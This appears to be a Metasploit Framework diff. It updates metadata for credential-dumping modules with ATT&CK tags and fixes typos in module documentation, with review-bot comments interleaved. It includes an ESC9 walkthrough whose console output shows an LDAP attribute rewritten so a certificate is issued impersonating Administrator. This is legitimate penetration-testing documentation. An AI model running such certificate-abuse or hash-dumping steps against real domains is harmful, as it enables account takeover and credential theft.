"description": "Post module to dump the password hashes for all users on a BSD system.",
"references": [],
"references": [
"ATT&CK-T1003.008"
],
"platform": "BSD",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-27 02:09:41 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/bsd/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "bsd/gather/hashdump",
@@ -267880,7 +269599,8 @@
"references": [
"URL-https://github.com/rbowes-r7/refreshing-mcp-tool",
"URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
"URL-https://support.f5.com/csp/article/K97843387"
"URL-https://support.f5.com/csp/article/K97843387",
"ATT&CK-T1003"
],
"platform": "Linux,Unix",
"arch": "",
@@ -267888,7 +269608,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-05-13 09:23:28 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/post/linux/gather/f5_loot_mcp.rb",
"is_install_path": true,
"ref_name": "linux/gather/f5_loot_mcp",
@@ -268043,14 +269763,16 @@
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post Module to dump the password hashes for all users on a Linux System",
"references": [],
"references": [
"ATT&CK-T1003.008"
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-27 12:23:56 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/linux/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "linux/gather/hashdump",
@@ -268087,7 +269809,8 @@
"description": "This module gathers the encrypted passwords stored by Password Manager\n Pro and decrypt them using key materials stored in multiple\n configuration files.",
"references": [
"URL-https://www.trustedsec.com/blog/the-curious-case-of-the-password-database/",
"URL-https://github.com/trustedsec/Zoinks/blob/main/zoinks.py"
"URL-https://github.com/trustedsec/Zoinks/blob/main/zoinks.py",
"ATT&CK-T1003"
],
"platform": "Linux,Unix",
"arch": "",
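Review bot: the reference appended to the list, `"ATT&CK-T1003"`, is a loose fit for `linux/gather/manageengine_password_manager_creds`. The description says the module decrypts passwords stored by Password Manager Pro using key material from its configuration files, which ATT&CK classifies under T1555 (Credentials from Password Stores), not T1003 (OS Credential Dumping, i.e. hashes and secrets held by the operating system itself). Suggest `ATT&CK-T1555` so mappings derived from this metadata do not group a password-vault extraction with SAM/LSASS dumping.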
@@ -268095,7 +269818,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-02 14:03:15 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/post/linux/gather/manageengine_password_manager_creds.rb",
"is_install_path": true,
"ref_name": "linux/gather/manageengine_password_manager_creds",
@@ -268133,7 +269856,9 @@
"URL-https://github.com/huntergregal/mimipenguin",
"URL-https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/1772919",
"URL-https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490",
"CVE-2018-20781"
"CVE-2018-20781",
"ATT&CK-T1003.007",
"ATT&CK-T1003.008"
],
"platform": "Linux",
"arch": "x86, x64, aarch64",
@@ -268141,7 +269866,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-05-13 09:23:28 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/linux/gather/mimipenguin.rb",
"is_install_path": true,
"ref_name": "linux/gather/mimipenguin",
@@ -268213,7 +269938,8 @@
],
"description": "This module grab OpenVPN credentials from a running process\n in Linux.\n\n Note: --auth-nocache must not be set in the OpenVPN command line.",
"references": [
"URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh"
"URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh",
"ATT&CK-T1003.007"
],
"platform": "Linux",
"arch": "",
@@ -268221,7 +269947,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-05-02 23:29:48 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/linux/gather/openvpn_credentials.rb",
"is_install_path": true,
"ref_name": "linux/gather/openvpn_credentials",
@@ -268460,7 +270186,8 @@
"URL-https://github.com/shmilylty/vhost_password_decrypt",
"CVE-2022-22948",
"URL-https://pentera.io/blog/information-disclosure-in-vmware-vcenter/",
"URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb"
"URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb",
"ATT&CK-T1003"
],
"platform": "Linux,Unix",
"arch": "",
@@ -268468,7 +270195,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-04-12 13:09:34 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/post/linux/gather/vcenter_secrets_dump.rb",
"is_install_path": true,
"ref_name": "linux/gather/vcenter_secrets_dump",
@@ -271802,7 +273529,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-05-21 10:45:08 +0000",
"mod_time": "2025-09-25 16:38:50 +0000",
"path": "/modules/post/multi/recon/local_exploit_suggester.rb",
"is_install_path": true,
"ref_name": "multi/recon/local_exploit_suggester",
@@ -271865,6 +273592,43 @@
"needs_cleanup": null,
"actions": []
},
"post_multi/recon/persistence_suggester": {
"name": "Persistence Exploit Suggester",
"fullname": "post/multi/recon/persistence_suggester",
"aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"h00die"
],
"description": "This module suggests persistence modules that can be used.\n The modules are suggested based on the architecture and platform\n that the user has a shell opened as well as the available exploits\n in meterpreter.\n It's important to note that not all modules will be checked.\n Exploits are chosen based on these conditions: session type,\n platform, architecture, and required default options.",
"references": [],
"platform": "AIX,Android,Apple_iOS,Arista,BSD,BSDi,Brocade,Cisco,Firefox,FreeBSD,HPUX,Hardware,Irix,Java,JavaScript,Juniper,Linux,Mainframe,Mikrotik,Multi,NetBSD,Netware,NodeJS,OSX,OpenBSD,PHP,Python,R,Ruby,Solaris,Unifi,Unix,Unknown,Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-09-25 16:38:50 +0000",
"path": "/modules/post/multi/recon/persistence_suggester.rb",
"is_install_path": true,
"ref_name": "multi/recon/persistence_suggester",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [],
"Reliability": [],
"SideEffects": []
},
"session_types": [
"meterpreter",
"shell"
],
"needs_cleanup": null,
"actions": []
},
"post_multi/recon/reverse_lookup": {
"name": "Reverse Lookup IP Addresses",
"fullname": "post/multi/recon/reverse_lookup",
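Review bot: `"Stability": []`, `"Reliability": []` and `"SideEffects": []` are all empty on the new `post_multi/recon/persistence_suggester` entry, and `"references": []` is empty too. The description says candidate modules are "checked", so the module does touch the target; whether those checks are crash-safe and whether they leave anything behind should be declared in Notes rather than left blank, since this is exactly the module an operator runs on a host they do not want to disturb. The description sentence "based on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter" also reads awkwardly; "the platform and architecture of the current session, and the exploits available to it" would say the same thing clearly.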
@@ -272873,14 +274637,16 @@
"joev <joev@metasploit.com>"
],
"description": "This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports\n versions 10.3 to 10.14.",
"references": [],
"references": [
"ATT&CK-T1003"
],
"platform": "OSX",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-05-01 02:49:28 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/post/osx/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "osx/gather/hashdump",
@@ -273507,14 +275273,16 @@
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "Post module to dump the password hashes for all users on a Solaris system.",
"references": [],
"references": [
"ATT&CK-T1003.008"
],
"platform": "Solaris",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-30 00:19:25 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/solaris/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "solaris/gather/hashdump",
@@ -274132,7 +275900,8 @@
],
"description": "This module uses the registry to extract the stored domain hashes that have been\n cached as a result of a GPO setting. The default setting on Windows is to store\n the last ten successful logins.",
"references": [
"URL-https://web.archive.org/web/20220407023137/https://lab.mediaservice.net/code/cachedump.rb"
"URL-https://web.archive.org/web/20220407023137/https://lab.mediaservice.net/code/cachedump.rb",
"ATT&CK-T1003.005"
],
"platform": "Windows",
"arch": "",
@@ -274140,7 +275909,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-30 11:23:07 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/gather/cachedump.rb",
"is_install_path": true,
"ref_name": "windows/gather/cachedump",
@@ -274578,14 +276347,16 @@
"tebo <tebo@attackresearch.com>"
],
"description": "This module harvests credentials found on the host and stores them in the database.",
"references": [],
"references": [
"ATT&CK-T1003"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-28 09:08:33 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/post/windows/gather/credentials/credential_collector.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/credential_collector",
@@ -274657,14 +276428,16 @@
"theLightCosine <theLightCosine@metasploit.com>"
],
"description": "This module attempts to copy the NTDS.dit database from a live Domain Controller\n and then parse out all of the User Accounts. It saves all of the captured password\n hashes, including historical ones.",
"references": [],
"references": [
"ATT&CK-T1003.003"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-28 09:08:33 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/gather/credentials/domain_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/domain_hashdump",
@@ -274778,14 +276551,16 @@
"Kx499"
],
"description": "This module will enumerate the Microsoft Credential Store and decrypt the\n credentials. This module can only access credentials created by the user the\n process is running as. It cannot decrypt Domain Network Passwords, but will\n display the username and location.",
"references": [],
"references": [
"ATT&CK-T1003"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/post/windows/gather/credentials/enum_cred_store.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/enum_cred_store",
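Review bot: `"ATT&CK-T1003"` is the wrong technique for `windows/gather/credentials/enum_cred_store`. The description says the module enumerates and decrypts the Microsoft Credential Store for the current user; ATT&CK maps that to T1555.004 (Credentials from Password Stores: Windows Credential Manager), whereas T1003 covers dumping OS-level secrets such as SAM, LSASS and NTDS. Suggest `ATT&CK-T1555.004` so detection mappings built from this file point at the Credential Manager technique.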
@@ -274816,14 +276591,16 @@
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will recover the LAPS (Local Administrator Password Solution) passwords,\n configured in Active Directory, which is usually only accessible by privileged users.\n Note that the local administrator account name is not stored in Active Directory,\n so it is assumed to be 'Administrator' by default.",
"references": [],
"references": [
"ATT&CK-T1003"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-28 09:08:33 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/post/windows/gather/credentials/enum_laps.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/enum_laps",
@@ -276985,14 +278762,16 @@
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This module will collect cleartext Single Sign On credentials from the Local\n Security Authority using the Kiwi (Mimikatz) extension. Blank passwords will not be stored\n in the database.",
"references": [],
"references": [
"ATT&CK-T1003.001"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-28 09:08:33 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/gather/credentials/sso.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/sso",
@@ -277684,7 +279463,8 @@
"description": "This module extracts the plain-text Windows user login password in Registry.\n It exploits a Windows feature that Windows (2000 to 2008 R2) allows a\n user or third-party Windows Utility tools to configure User AutoLogin via\n plain-text password insertion in (Alt)DefaultPassword field in the registry\n location - HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable\n by all users.",
"references": [
"URL-http://support.microsoft.com/kb/315231",
"URL-http://core.yehg.net/lab/#tools.exploits"
"URL-http://core.yehg.net/lab/#tools.exploits",
"ATT&CK-T1003"
],
"platform": "Windows",
"arch": "",
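Review bot: `"ATT&CK-T1003"` does not match what `windows/gather/credentials/windows_autologin` does. The description says it reads a plain-text password from the `(Alt)DefaultPassword` value under `HKLM\Software\Microsoft\Windows NT\WinLogon`, which ATT&CK classifies as T1552.002 (Unsecured Credentials: Credentials in Registry); T1003 is for dumping OS credential material such as hashes and LSASS memory. Suggest `ATT&CK-T1552.002`.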
@@ -277692,7 +279472,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-28 09:08:33 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/gather/credentials/windows_autologin.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/windows_autologin",
@@ -277729,7 +279509,8 @@
"CVE-2021-36934",
"URL-https://github.com/GossiTheDog/HiveNightmare",
"URL-https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652",
"URL-https://github.com/romarroca/SeriousSam"
"URL-https://github.com/romarroca/SeriousSam",
"ATT&CK-T1003.002"
],
"platform": "Windows",
"arch": "",
@@ -277737,7 +279518,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-10-06 13:43:31 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb",
"is_install_path": true,
"ref_name": "windows/gather/credentials/windows_sam_hivenightmare",
@@ -279917,7 +281698,8 @@
],
"description": "This module gathers a file using the raw NTFS device, bypassing some Windows restrictions\n such as open file with write lock. Because it avoids the usual file locking issues, it can\n be used to retrieve files such as NTDS.dit.",
"references": [
"URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/"
"URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/",
"ATT&CK-T1003.003"
],
"platform": "Windows",
"arch": "",
@@ -279925,7 +281707,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-05-03 12:57:40 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/gather/file_from_raw_ntfs.rb",
"is_install_path": true,
"ref_name": "windows/gather/file_from_raw_ntfs",
@@ -280269,14 +282051,16 @@
"hdm <x@hdm.io>"
],
"description": "This module will dump the local user accounts from the SAM database using the registry",
"references": [],
"references": [
"ATT&CK-T1003.002"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-30 11:23:07 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/gather/hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/hashdump",
@@ -280347,14 +282131,16 @@
"Rob Bathurst <rob.bathurst@foundstone.com>"
],
"description": "This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:\n HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt\n code from cachedump.",
"references": [],
"references": [
"ATT&CK-T1003.004"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-30 11:23:07 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/gather/lsa_secrets.rb",
"is_install_path": true,
"ref_name": "windows/gather/lsa_secrets",
@@ -280423,14 +282209,16 @@
"smashery"
],
"description": "This module creates a memory dump of a process (to disk) and downloads the file\n for offline analysis.\n\n Options for DUMP_TYPE affect the completeness of the dump:\n\n \"full\" retrieves the entire process address space (all allocated pages);\n \"standard\" excludes image files (e.g. DLLs and EXEs in the address space) as\n well as memory mapped files. As a result, this option can be significantly\n smaller in size.",
"references": [],
"references": [
"ATT&CK-T1003.001"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-30 11:23:07 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/gather/memory_dump.rb",
"is_install_path": true,
"ref_name": "windows/gather/memory_dump",
@@ -280546,14 +282334,16 @@
"Koen Riepe (koen.riepe <Koen Riepe (koen.riepe@fox-it.com)>"
],
"description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n It compresses all these files in a cabinet file called All.cab.",
"references": [],
"references": [
"ATT&CK-T1003.003"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-30 11:23:07 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/gather/ntds_grabber.rb",
"is_install_path": true,
"ref_name": "windows/gather/ntds_grabber",
@@ -280832,14 +282622,16 @@
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This will dump local accounts from the SAM Database. If the target\n host is a Domain Controller, it will dump the Domain Account Database using the proper\n technique depending on privilege level, OS and role of the host.",
"references": [],
"references": [
"ATT&CK-T1003.002"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-04-30 11:23:07 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/gather/smart_hashdump.rb",
"is_install_path": true,
"ref_name": "windows/gather/smart_hashdump",
@@ -281844,7 +283636,8 @@
"description": "Manage kerberos tickets on a compromised host.",
"references": [
"URL-https://github.com/GhostPack/Rubeus",
"URL-https://github.com/wavvs/nanorobeus"
"URL-https://github.com/wavvs/nanorobeus",
"ATT&CK-T1003.004"
],
"platform": "Windows",
"arch": "",
@@ -281852,7 +283645,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-05-13 09:23:28 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/post/windows/manage/kerberos_tickets.rb",
"is_install_path": true,
"ref_name": "windows/manage/kerberos_tickets",
@@ -282313,7 +284106,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2025-05-09 10:51:17 +0000",
"mod_time": "2025-09-23 16:22:40 +0000",
"path": "/modules/post/windows/manage/powershell/exec_powershell.rb",
"is_install_path": true,
"ref_name": "windows/manage/powershell/exec_powershell",

@@ -57,4 +57,4 @@ override.
```bash
echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env
```
Now you should be able get reverse shells working
Now you should be able to get reverse shells working
@@ -6,4 +6,4 @@
* [Facts and myths about antivirus evasion with Metasploit](http://schierlm.users.sourceforge.net/avevasion.html)
* [Using metasm to avoid antivirus detection ghost writing asm](https://web.archive.org/web/20200330111926/https://www.pentestgeek.com/penetration-testing/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm)
There are approximately 14 million other resources out there on the why's and wherefores of evading antivirus, but the about articles should get you started.
There are approximately 14 million other resources out there on the why's and wherefores of evading antivirus, but the above articles should get you started.
@@ -110,7 +110,7 @@ end
* **Stability** - The Stability field describes how the exploit affects the system it's being run on, ex: `CRASH_SAFE`, `CRASH_OS_DOWN`
* **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
* **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.
* **SideEffects** - The SideEffects field describes the side effects caused by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.
### Non-required fields
@@ -41,7 +41,7 @@ include Msf::Auxiliary::Scanner
A couple of new things will be added to your module when you include this mixin. You will have a new datastore option named "RHOSTS", which allows the user to specify multiple hosts. There's a new "THREADS" option, which allows the number of threads to run during execution. There's also "ShowProgress" and "ShowProgressPercent" for tracking scan progress.
Typically, the main method for an auxiliary module is "def run". But when you use the ```Msf::Auxiliary::Scanenr``` mixin, you need to be using ```def run_host(ip)```. The IP parameter is the target machine.
Typically, the main method for an auxiliary module is "def run". But when you use the ```Msf::Auxiliary::Scanner``` mixin, you need to be using ```def run_host(ip)```. The IP parameter is the target machine.
## Templates
@@ -54,9 +54,9 @@ retrieve deployment packages from S3.
The VPC or Virtual Private Cloud, an isolated local area network. Network access
can be made available by assigning an Internet routable IP address to a host or
routing traffic to it through an ELB (Elastic Load Balancer). In either case
security-groups are used to open access to network ranges and specific TPC/UDP
security-groups are used to open access to network ranges and specific TCP/UDP
ports. Security-groups provide much of the functionality of traditional firewalls
and can be configured by specifying a protocol, a CIDR and a port.
and can be configured by specifying a protocol, a CIDR and a port.
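Review bot: the context line "The VPC or Virtual Private Cloud, an isolated local area network." has no main verb; while the TPC/TCP typo is being fixed in this hunk, consider "The VPC, or Virtual Private Cloud, is an isolated local area network."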
## How it Works
@@ -65,7 +65,7 @@ Web console or the CLI, launching a host in the Cloud requires a fair
amount of configuration; this module does its best to abstract configuration
requirements away from the user by auto detecting the VPC, subnets, creating
security groups, etc. It performs several tasks to launch a host with
a public IP address, these are as follow: 1) select a VPC, 2) select a subnet, 3)
a public IP address, these are as follows: 1) select a VPC, 2) select a subnet, 3)
create/select a security group, 4) create/select a key-pair, and 5) launch
a host.
@@ -80,7 +80,7 @@ an Internet routable IP address. The module dynamically finds which subnet to
launch the host in. It will use the first subnet it finds having the
`Auto-assign Public IP` option set, if no such subnet exists, then it will
select the first subnet having an Internet gateway. To circumvent this process,
the `SUBNET_ID` advanced option can be set.
the `SUBNET_ID` advanced option can be set.
When launching a Cloud host at least one security group is required. There are
several advanced options for creating/selecting a security group. The
@@ -88,7 +88,7 @@ several advanced options for creating/selecting a security group. The
That is, the module will create a security group unless the `SEC_GROUP_ID`
options is set. If the `SEC_GROUP_ID` option is not set, the module will attempt
to create a security group using the values specified in the `SEC_GROUP_CIDR`,
`SEC_GROUP_NAME`, and `SEC_GROUP_PORT` options as configuration.
`SEC_GROUP_NAME`, and `SEC_GROUP_PORT` options as configuration.
The `KEY_NAME` and `SSH_PUB_KEY` options are used in conjunction to select or
create a key-pair (a named SSH public key). Key-pairs are used to authenticate
@@ -113,7 +113,7 @@ use command. To run the module, only the `AccessKeyId`, `SecretAccessKey`, and
Basic Options:
* `AMI_ID`: The Amazon Machine Image (AMI) ID (region dependent)
* `RHOST`: the AWS EC2 Endpoint (ec2.us-west-2.amazonaws.com), may change this to something closer to you
* `RHOST`: The AWS EC2 Endpoint (ec2.us-west-2.amazonaws.com), may change this to something closer to you
* `Region`: The default region (us-west-2), must match endpoint
* `AccessKeyId`: AWS API access key
* `SecretAccessKey`: AWS API secret access key
@@ -129,10 +129,10 @@ Advanced Options:
* `MinCount`: Minimum number of instances to launch
* `ROLE_NAME`: The instance profile/role name
* `RPORT:` AWS EC2 Endpoint TCP Port
* `SEC_GROUP_ID`: the EC2 security group to use
* `SEC_GROUP_CIDR`: the EC2 security group network access CIDR, defaults to 0.0.0.0/0
* `SEC_GROUP_NAME`: the EC2 security group name
* `SEC_GROUP_PORT`: the EC2 security group network access port, defaults to tcp:22
* `SEC_GROUP_ID`: The EC2 security group to use
* `SEC_GROUP_CIDR`: The EC2 security group network access CIDR, defaults to 0.0.0.0/0
* `SEC_GROUP_NAME`: The EC2 security group name
* `SEC_GROUP_PORT`: The EC2 security group network access port, defaults to tcp:22
* `SUBNET_ID`: The public subnet to use
* `UserAgent`: The User-Agent header to use for all requests
* `VPC_ID`: The EC2 VPC ID
@@ -181,7 +181,7 @@ msf auxiliary(aws_launch_instances) > run
...
[*] instance i-12345678 status: ok
[*] Instance i-12345678 has IP address 54.186.158.6
[*] Auxiliary module execution completed
[*] Auxiliary module execution completed
```
When the host has passed its primary system checks, the IP address will be
@@ -12,7 +12,7 @@ Only the deprecated DIAL protocol is supported by this module. Casting via the n
## Options
**VID**
### VID
The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)
@@ -36,6 +36,9 @@ The certificate template to issue, e.g., "User".
### TARGET_USERNAME
The username of the target account whose LDAP object will be updated and for whom the certificate will be requested.
### TARGET_PASSWORD
The password of the target username. Not required. The module will use Shadow Credentials to authenticate as the target user if this is left blank.
### UPDATE_LDAP_OBJECT
The LDAP attribute to update, such as `userPrincipalName` or `dNSHostName`.
@@ -135,6 +138,72 @@ msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > run
[*] Auxiliary module execution completed
```
### ESC9 - Update userPrincipalName when you already have `TARGET_PASSWORD`. See shadow credentials don't get created / used
```
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > options
Module options (auxiliary/admin/dcerpc/esc_update_ldap_object):
Name Current Setting Required Description
---- --------------- -------- -----------
ADD_CERT_APP_POLICY no Add certificate application policy OIDs
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN no Alternative certificate UPN (format: USER@DOMAIN)
CA kerberos-DC2-CA yes The target certificate authority
CERT_TEMPLATE User yes The certificate template
LDAPDomain kerberos.issue yes The domain to authenticate to
LDAPPassword N0tpassword! yes The password to authenticate with
LDAPUsername user1 yes The username to authenticate with, who must have permissions to update the TARGET_USERNAME
SSL false no Enable SSL on the LDAP connection
TARGET_PASSWORD N0tpassword! no The password of the target LDAP object (the victim account). If left blank, Shadow Credentials will be used to authenticaet as the TARGET_USERNAME
TARGET_USERNAME user2 yes The username of the target LDAP object (the victim account).
UPDATE_LDAP_OBJECT userPrincipalName yes Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. (Accepted: userPrincipalName, dNSHostName)
UPDATE_LDAP_OBJECT_VALUE Administrator yes The account name you wish to impersonate
Used when making a new connection via RHOSTS:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.199.200 no The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 no The target port (TCP)
Auxiliary action:
Name Description
---- -----------
REQUEST_CERT Request a certificate
View the full module info with the info, or info -d command.
msf auxiliary(admin/dcerpc/esc_update_ldap_object) > run
[*] Running module against 172.16.199.200
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Current value of user2's userPrincipalName:
[*] Attempting to update userPrincipalName for CN=user2,CN=Users,DC=kerberos,DC=issue to Administrator...
[+] Successfully updated CN=user2,CN=Users,DC=kerberos,DC=issue's userPrincipalName to Administrator
[+] The operation completed successfully!
[+] 172.16.199.200:445 - The requested certificate was issued.
[*] 172.16.199.200:445 - Certificate Policies:
[*] 172.16.199.200:445 - Certificate UPN: Administrator
[*] 172.16.199.200:445 - Certificate stored at: /home/msfuser/.msf4/loot/20250923135918_default_172.16.199.200_windows.ad.cs_341723.pfx
[*] 172.16.199.200:445 - Reverting ldap object
[*] 172.16.199.200:445 - Loading auxiliary/admin/ldap/ldap_object_attribute
[*] 172.16.199.200:445 - Running auxiliary/admin/ldap/ldap_object_attribute
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
[*] Attempting to delete attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue...
[+] Successfully deleted attribute userPrincipalName from CN=user2,CN=Users,DC=kerberos,DC=issue
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf auxiliary(admin/dcerpc/esc_update_ldap_object) >
```
### ESC9 - Update dnsHostName to `dc2.kerberos.issue`
```
msf6 auxiliary(admin/dcerpc/esc_update_ldap_object) > set rhosts 172.16.199.200
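Review bot: the TARGET_PASSWORD description captured in the `options` output reads "authenticaet"; since this is module output, the typo should be fixed in the option's description string in the esc_update_ldap_object module and the sample output regenerated or edited to match. The new heading "ESC9 - Update userPrincipalName when you already have `TARGET_PASSWORD`. See shadow credentials don't get created / used" reads as a note rather than a heading; suggest "ESC9 - Update userPrincipalName with `TARGET_PASSWORD` set (no Shadow Credentials are created or used)". The prompt also alternates between `msf` and `msf6` within the same file.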
@@ -11,11 +11,11 @@ This module exploits the CVE-2017-12542 for authentication bypass on HP iLO, whi
## Options
**USERNAME**
### USERNAME
The username of the new administrator account. Defaults to a random string.
**PASSWORD**
### PASSWORD
The password of the new administrator account. Defaults to a random string.
@@ -39,4 +39,4 @@ msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run
